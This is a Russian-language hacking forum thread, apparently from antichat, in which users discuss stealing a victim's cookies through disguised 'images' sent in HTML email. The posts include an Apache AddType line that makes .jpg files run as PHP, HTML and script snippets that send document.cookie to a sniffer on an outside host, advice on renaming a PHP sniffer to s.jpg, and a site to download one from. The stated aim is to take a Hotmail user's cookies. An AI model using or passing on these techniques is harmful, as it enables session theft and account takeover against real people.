Cookie через рисунки
 

Слыхал можно cookie красть через рисунки на активных хсс.
у кого есть идеии

:) Товарисчь, картинки - это не в прямом смысле, ты имеешь в виду файлы с расширением jpg которые интерпретируються сервером как php скрипт...

Таким образом - AddType application/x-httpd-php .jpg

нет например жертве маил в хтмл формате отправим, с рисунками. а в рисунках xss на наш сниффер

Ты имеешь ввиду вот это?

Примеры использования сниффера:
Простой вызов по ссылке:
<a href="http://antichat.ru/cgi-bin/s.jpg?it is test">click me</a>
Вызов как картинки:
<img src="http://antichat.ru/cgi-bin/s.jpg">
Вызов из скрипта:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

(с) old.antichat.ru

А эта "картинка" является собой пхп кодом, выполняющимся на сервере и сохраняющая кукисы жертвы

2 ой варриант
но как закапывать коды в рисунок.
например я хочу отправить писмо по хотмаил и когда он откроет писмо куки шли на мой сниффер

Для начала создаешь файл s.php в него пишешь код снифера, затем переименовываешь в s.jpg

Скачать снифер можно с http://kanick.ru, полазий по архиву и разберешься

статейка про это ... тут

.....

у тебя internet explorer 7, а видимо надо 6 чтобы работало

Мой IE7 открыл эту ссылку как текст такого содержания: